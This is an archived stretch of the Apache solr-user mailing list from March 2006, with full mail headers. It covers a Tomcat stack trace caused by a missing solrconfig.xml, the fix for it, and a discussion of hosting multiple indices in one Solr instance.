b=AsDgyNHecVE3LttHnLQ6qUJX5qEIky2JOyotPfPtZKbzQVFoQX3AdE2jP/O5v+SjsKkzNdiETSSB1E5hfYLrsKZ63LV58Wcs4UZPmrsBbFhYOAEoaBmWNa6zuvGnDXW7UWjKXz6I5h6dDenk6HfLwnPsorlSDOMX6scSicx7vUo= Received: by 161.129.204.104 with SMTP id e5mr948762qbk; Mon, 20 Mar 2006 20:37:03 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 20:37:03 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 20 Mar 2006 22:37:03 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ok.. here is the error: 2006-03-20 22:37:03 StandardContext[/solr]StandardWrapper.Throwable java.lang.ExceptionInInitializerError =09at org.apache.solr.update.SolrIndexConfig.<clinit>(Unknown Source) =09at org.apache.solr.core.SolrCore.<clinit>(Unknown Source) =09at org.apache.solr.servlet.SolrServlet.init(Unknown Source) =09at javax.servlet.GenericServlet.init(GenericServlet.java:211) =09at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.= java:1029) =09at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:86= 2) =09at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContex= t.java:4013) =09at org.apache.catalina.core.StandardContext.start(StandardContext.java:4= 357) =09at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase= .java:823) =09at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:80= 7) =09at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:595) =09at org.apache.catalina.core.StandardHostDeployer.install(StandardHostDep= loyer.java:277) =09at org.apache.catalina.core.StandardHost.install(StandardHost.java:832) =09at org.apache.catalina.startup.HostConfig.deployWARs(HostConfig.java:625= ) =09at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:431= ) =09at org.apache.catalina.startup.HostConfig.start(HostConfig.java:983) =09at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java= :349) =09at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(Lifecycl= eSupport.java:119) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1091) =09at org.apache.catalina.core.StandardHost.start(StandardHost.java:789) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1083) =09at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:478= ) =09at org.apache.catalina.core.StandardService.start(StandardService.java:4= 80) =09at org.apache.catalina.core.StandardServer.start(StandardServer.java:231= 3) =09at org.apache.catalina.startup.Catalina.start(Catalina.java:556) =09at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) =09at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.= java:39) =09at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAcces= sorImpl.java:25) =09at java.lang.reflect.Method.invoke(Method.java:585) =09at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:287) =09at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:425) Caused by: java.lang.RuntimeException: Can't find resource solrconfig.xml =09at org.apache.solr.core.Config.openResource(Unknown Source) =09at org.apache.solr.core.SolrConfig.<clinit>(Unknown Source) =09... 31 more 2006-03-20 22:37:03 StandardContext[/solr]Servlet /solr threw load() except= ion javax.servlet.ServletException: Servlet.init() for servlet SolrServer threw exception =09at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.= java:1071) =09at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:86= 2) =09at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContex= t.java:4013) =09at org.apache.catalina.core.StandardContext.start(StandardContext.java:4= 357) =09at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase= .java:823) =09at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:80= 7) =09at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:595) =09at org.apache.catalina.core.StandardHostDeployer.install(StandardHostDep= loyer.java:277) =09at org.apache.catalina.core.StandardHost.install(StandardHost.java:832) =09at org.apache.catalina.startup.HostConfig.deployWARs(HostConfig.java:625= ) =09at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:431= ) =09at org.apache.catalina.startup.HostConfig.start(HostConfig.java:983) =09at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java= :349) =09at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(Lifecycl= eSupport.java:119) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1091) =09at org.apache.catalina.core.StandardHost.start(StandardHost.java:789) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1083) =09at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:478= ) =09at org.apache.catalina.core.StandardService.start(StandardService.java:4= 80) =09at org.apache.catalina.core.StandardServer.start(StandardServer.java:231= 3) =09at org.apache.catalina.startup.Catalina.start(Catalina.java:556) =09at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) =09at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.= java:39) =09at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAcces= sorImpl.java:25) =09at java.lang.reflect.Method.invoke(Method.java:585) =09at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:287) =09at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:425) ----- Root Cause ----- java.lang.ExceptionInInitializerError =09at org.apache.solr.update.SolrIndexConfig.<clinit>(Unknown Source) =09at org.apache.solr.core.SolrCore.<clinit>(Unknown Source) =09at org.apache.solr.servlet.SolrServlet.init(Unknown Source) =09at javax.servlet.GenericServlet.init(GenericServlet.java:211) =09at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.= java:1029) =09at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:86= 2) =09at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContex= t.java:4013) =09at org.apache.catalina.core.StandardContext.start(StandardContext.java:4= 357) =09at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase= .java:823) =09at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:80= 7) =09at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:595) =09at org.apache.catalina.core.StandardHostDeployer.install(StandardHostDep= loyer.java:277) =09at org.apache.catalina.core.StandardHost.install(StandardHost.java:832) =09at org.apache.catalina.startup.HostConfig.deployWARs(HostConfig.java:625= ) =09at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:431= ) =09at org.apache.catalina.startup.HostConfig.start(HostConfig.java:983) =09at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java= :349) =09at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(Lifecycl= eSupport.java:119) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1091) =09at org.apache.catalina.core.StandardHost.start(StandardHost.java:789) =09at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1083) =09at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:478= ) =09at org.apache.catalina.core.StandardService.start(StandardService.java:4= 80) =09at org.apache.catalina.core.StandardServer.start(StandardServer.java:231= 3) =09at org.apache.catalina.startup.Catalina.start(Catalina.java:556) =09at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) =09at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.= java:39) =09at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAcces= sorImpl.java:25) =09at java.lang.reflect.Method.invoke(Method.java:585) =09at org.apache.catalina.startup.Bootstrap.start(Bootstrap.java:287) =09at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:425) Caused by: java.lang.RuntimeException: Can't find resource solrconfig.xml =09at org.apache.solr.core.Config.openResource(Unknown Source) =09at org.apache.solr.core.SolrConfig.<clinit>(Unknown Source) =09... 31 more 2006-03-20 22:37:06 StandardContext[/servlets-examples]ContextListener: contextInitialized() 2006-03-20 22:37:06 StandardContext[/servlets-examples]SessionListener: contextInitialized() 2006-03-20 22:37:08 StandardContext[/jsp-examples]ContextListener: contextInitialized() 2006-03-20 22:37:08 StandardContext[/jsp-examples]SessionListener: contextInitialized() On 3/20/06, Mike Austin <[email protected]> wrote: > Actually.. it looks like it is still not finding solrconfig.xml because > after I restart tomcat I get the config file error. Where should this go > again? I know you said ./solrconf, but relative to what? > > Also, I still don't know if I deployed the site correctly..the only thing= I > did was copy the solr.war to the tomcat/webapps folder. > > Thanks > > From [email protected] Tue Mar 21 05:45:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35308 invoked from network); 21 Mar 2006 05:45:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 05:45:23 -0000 Received: (qmail 13478 invoked by uid 500); 21 Mar 2006 05:45:22 -0000 Delivered-To: [email protected] Received: (qmail 13424 invoked by uid 500); 21 Mar 2006 05:45:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13415 invoked by uid 99); 21 Mar 2006 05:45:22 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 21:45:22 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 21:45:19 -0800 Received: by uproxy.gmail.com with SMTP id a2so678121ugf for <[email protected]>; Mon, 20 Mar 2006 21:44:58 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ckimaobaROMJCthIszmkJLAy/+QpgVgKtfjMwsAhMo1dVkY/8pEkXaorEmC8EydGDe0JS7YhHL9Hj6IxGlEIFxuk6wFZnSUEb9U+N9OjbgHCrIjUBPjf/ar2y4sQ6UdxHSugzK4x67aQeWO3FFXxC5fV4ZGmKv42Lpa4jR011i8= Received: by 161.129.204.104 with SMTP id w6mr4670461ugi; Mon, 20 Mar 2006 21:44:57 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 21:44:57 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 21 Mar 2006 00:44:57 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N > Caused by: java.lang.RuntimeException: Can't find resource solrconfig.xml Hmmm, we've been moving around the config directory lately... what version are you working off of. Check that the example directory has ./solrconf in it. Then check that there is a ./solrconf/ from wherever you are starting the app server. the layout should look something like this: tomcat/webapps/solr.war tomcat/solrconf/solrconfig.xml, schema.xml, etc tomcat/bin/startup.sh then start tomcat by executing ./bin/startup.sh from the tomcat directory -Yonik From [email protected] Tue Mar 21 06:15:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50718 invoked from network); 21 Mar 2006 06:15:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 06:15:58 -0000 Received: (qmail 31866 invoked by uid 500); 21 Mar 2006 06:15:58 -0000 Delivered-To: [email protected] Received: (qmail 31838 invoked by uid 500); 21 Mar 2006 06:15:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31829 invoked by uid 99); 21 Mar 2006 06:15:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 22:15:57 -0800 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_00_10,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Mar 2006 22:15:56 -0800 Received: by zproxy.gmail.com with SMTP id m22so1271607nzf for <[email protected]>; Mon, 20 Mar 2006 22:15:36 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=BYe4HzRuy4kwjFtcB1gH6u4QFQEEc24Pn1DHgeo9YNTqIalAkG9flI6pk5OUKGBoOch4/QQPcTjEBaltIOuB2WgWoGqpaCTyzIDLvecVbyI8ZKwszvJ73TlycdQy8HZw1ub6tbn9eXigAbbYQHo71SU5Gqo/flzNPa5dyjvOpQo= Received: by 161.129.204.104 with SMTP id m19mr1008799qbl; Mon, 20 Mar 2006 22:15:36 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 20 Mar 2006 22:15:36 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 21 Mar 2006 00:15:36 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_1389_23958558.1142921736104" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_1389_23958558.1142921736104 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Ahhh!! OK.. next time you see me you can back-slap me. I was doing a cd into bin and starting tomcat. Now it is working. Sorry to waste your time, it was my mistake all along. I did install tomcat 5.5 but the issue was the startup. Thanks, Mike ------=_Part_1389_23958558.1142921736104-- From [email protected] Tue Mar 21 21:14:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69961 invoked from network); 21 Mar 2006 21:14:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 21:14:10 -0000 Received: (qmail 60811 invoked by uid 500); 21 Mar 2006 21:14:09 -0000 Delivered-To: [email protected] Received: (qmail 60783 invoked by uid 500); 21 Mar 2006 21:14:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60774 invoked by uid 99); 21 Mar 2006 21:14:08 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 13:14:08 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50505.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 21 Mar 2006 13:14:08 -0800 Received: (qmail 13060 invoked by uid 60001); 21 Mar 2006 21:13:47 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=oZonDLNwuQrYhSrf68a074c0HJuWYc9SWuTIxituL0KWNXze79qjhE2ywRZEbE6GhB9aRduyg5R1lJJJrduaeZ3chA+nzIcX/Vh9tNTcccSVL5FY7UU5EEo6wskv8auVrpmY7FcLHQ1ciJgO7SWlnQ1XYelG0VAAQsY+jlOjM+Q= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web50505.mail.yahoo.com via HTTP; Tue, 21 Mar 2006 13:13:46 PST Date: Tue, 21 Mar 2006 13:13:46 -0800 (PST) From: Grant Ingersoll <[email protected]> Subject: Multiple indices To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1122757807-1142975626=:12385" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-1122757807-1142975626=:12385 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit I was wondering if it is possible to have one SOLR instance host multiple indices? Otherwise, I would need to deploy a separate WAR for every SOLR instance I want, correct? Not sure if this related to the discussion of location of configuration files that occurred on the dev list... But, if it could host multiple indices, we might want to put the schema in the same directory as the index, and then have the config point to the different indices. -Grant ---------------------------------------------- Grant Ingersoll http://www.grantingersoll.com --------------------------------- Yahoo! Mail Bring photos to life! New PhotoMail makes sharing a breeze. --0-1122757807-1142975626=:12385-- From [email protected] Tue Mar 21 21:34:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81671 invoked from network); 21 Mar 2006 21:34:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Mar 2006 21:34:57 -0000 Received: (qmail 90453 invoked by uid 500); 21 Mar 2006 21:34:56 -0000 Delivered-To: [email protected] Received: (qmail 90433 invoked by uid 500); 21 Mar 2006 21:34:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90423 invoked by uid 99); 21 Mar 2006 21:34:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 13:34:56 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Mar 2006 13:34:55 -0800 Received: by uproxy.gmail.com with SMTP id m3so804046ugc for <[email protected]>; Tue, 21 Mar 2006 13:34:31 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ZqXvbk/V7Gi22enwdx183xYIy4YS9a6T5+z6vT6/myqWkA2SIWcmx4Q6AEGXAakkFY2Oa2kacApPviIwIXZGxAd/TneazfR1TnvBVdVwm0tyM6M5PXwG0zWDbB0peGlQeSdukUMuT0bs3gTEJYaHsfM1bfmW9fH9vfu4VFCWicU= Received: by 161.129.204.104 with SMTP id q7mr60963ugh; Tue, 21 Mar 2006 13:34:31 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 21 Mar 2006 13:34:31 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 21 Mar 2006 16:34:31 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: Multiple indices In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/21/06, Grant Ingersoll <[email protected]> wrote: > I was wondering if it is possible to have one SOLR instance host multiple= indices? Otherwise, I would need to deploy a separate WAR for every SOLR = instance I want, correct? It's not currently possible. A fair amount would have to change to support that I think... - index id in all update commands (or a change in the URL path) - index id in all query commands (or a change in the URL path) Would a single index searcher go over multiple unrelated indicies? I think not, since that would tend to cause problems for thinks like norms, term vectors, field caches, etc. It almost sounds like one would want multiple instances of Solr in the same app container. But if that's the case, you aren't saving much over just having multiple app servers. -Yonik From [email protected] Wed Mar 22 20:11:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82054 invoked from network); 22 Mar 2006 20:11:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 20:11:08 -0000 Received: (qmail 41731 invoked by uid 500); 22 Mar 2006 20:11:08 -0000 Delivered-To: [email protected] Received: (qmail 41705 invoked by uid 500); 22 Mar 2006 20:11:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41682 invoked by uid 99); 22 Mar 2006 20:11:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 12:11:07 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 12:11:06 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id CEAED5B771; Wed, 22 Mar 2006 12:10:36 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id C57F37F403 for <[email protected]>; Wed, 22 Mar 2006 12:10:36 -0800 (PST) Date: Wed, 22 Mar 2006 12:10:36 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: Multiple indices In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : norms, term vectors, field caches, etc. It almost sounds like one : would want multiple instances of Solr in the same app container. But : if that's the case, you aren't saving much over just having multiple : app servers. I didn't say anything yesterday because i pretty much agreed with yonik ... but it occured to me this morning that if you have a finite amout of ram on a box (which we all do) 'R' gigs, and you want to run a variable number of solr indexs 'N", the only way to do this currently is to run N appserver instances and explicitly configure the JVM for each to use at most R/N Gigs max heap ... which would bnot only make addign a new index a pain (you have to reconfigure every appserver instance) but it also means that you are managine your memory instead of letting java do it. if it was possible to run several indexes in one appserver, then you wouldn't have to wworry about this (but if you wnated to worry about it, you could run some or all of your indexes in their own appserver instances) perhaps one way to go would be if solr paid attention to what webapp name it was being run in, and used that to determine the directory it looked in for it's configs/index? ... so most people would just intall "solr.war" and it would look for everything in ./solr/ -- but if i want multiple idexes i copy solr.war was solr-people.war, solr-places.war, and solr-things.war, and now i've got 3 webapps running solr, and 3 seperate directories containing 3 seperate indexes and configs... ./solr-people/, ./solr-places/, ./solar-things, etc... -Hoss From [email protected] Wed Mar 22 20:45:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3857 invoked from network); 22 Mar 2006 20:45:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Mar 2006 20:45:21 -0000 Received: (qmail 20328 invoked by uid 500); 22 Mar 2006 20:45:14 -0000 Delivered-To: [email protected] Received: (qmail 20311 invoked by uid 500); 22 Mar 2006 20:45:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20302 invoked by uid 99); 22 Mar 2006 20:45:14 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 12:45:14 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50310.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 22 Mar 2006 12:45:13 -0800 Received: (qmail 21182 invoked by uid 60001); 22 Mar 2006 20:44:52 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=eeJ9d0YPSIx4mQwG/hhvVuuWHXzbgMPvA6kdaHN7j7DuhRbRoJZ9GWDlo+8ZYXavxKTSri2aqnjKRRx6omDUwKbRQ/NQfcd1OJuVi9a9o0rG5oIx/reEsCx+Sswu/XrQbCFg5Y2IsJF333NaSKsvkNTs5wPuDvzkYKrR0taLV38= ; Message-ID: <[email protected]> Date: Wed, 22 Mar 2006 12:44:52 -0800 (PST) From: Otis Gospodnetic <[email protected]> Reply-To: Otis Gospodnetic <[email protected]> Subject: Re: Multiple indices To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Just a quick comment.... not sure how things are really set up for Solr, but one could use the /solr/index/XXX URL "scheme" to determine which index the request is for. Configs for different indices could be named after that "index" part in the URL, and that "index" part could be used as the key in various data structures that store index-specific information. Otis ----- Original Message ---- From: Chris Hostetter <[email protected]> To: [email protected] Sent: Wednesday, March 22, 2006 3:10:36 PM Subject: Re: Multiple indices : norms, term vectors, field caches, etc. It almost sounds like one : would want multiple instances of Solr in the same app container. But : if that's the case, you aren't saving much over just having multiple : app servers. I didn't say anything yesterday because i pretty much agreed with yonik ... but it occured to me this morning that if you have a finite amout of ram on a box (which we all do) 'R' gigs, and you want to run a variable number of solr indexs 'N", the only way to do this currently is to run N appserver instances and explicitly configure the JVM for each to use at most R/N Gigs max heap ... which would bnot only make addign a new index a pain (you have to reconfigure every appserver instance) but it also means that you are managine your memory instead of letting java do it. if it was possible to run several indexes in one appserver, then you wouldn't have to wworry about this (but if you wnated to worry about it, you could run some or all of your indexes in their own appserver instances) perhaps one way to go would be if solr paid attention to what webapp name it was being run in, and used that to determine the directory it looked in for it's configs/index? ... so most people would just intall "solr.war" and it would look for everything in ./solr/ -- but if i want multiple idexes i copy solr.war was solr-people.war, solr-places.war, and solr-things.war, and now i've got 3 webapps running solr, and 3 seperate directories containing 3 seperate indexes and configs... ./solr-people/, ./solr-places/, ./solar-things, etc... -Hoss From [email protected] Thu Mar 23 00:34:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16391 invoked from network); 23 Mar 2006 00:34:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 00:34:32 -0000 Received: (qmail 49018 invoked by uid 500); 23 Mar 2006 00:34:31 -0000 Delivered-To: [email protected] Received: (qmail 48997 invoked by uid 500); 23 Mar 2006 00:34:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48988 invoked by uid 99); 23 Mar 2006 00:34:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 16:34:31 -0800 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO ylpvm01.prodigy.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 22 Mar 2006 16:34:30 -0800 Received: from pimout6-ext.prodigy.net (pimout6-int.prodigy.net [161.129.204.104]) by ylpvm01.prodigy.net (8.12.10 outbound/8.12.10) with ESMTP id k2N0Y6ag030588 for <[email protected]>; Wed, 22 Mar 2006 19:34:07 -0500 X-ORBL: [161.129.204.104] Received: from us.forensiclogic.com 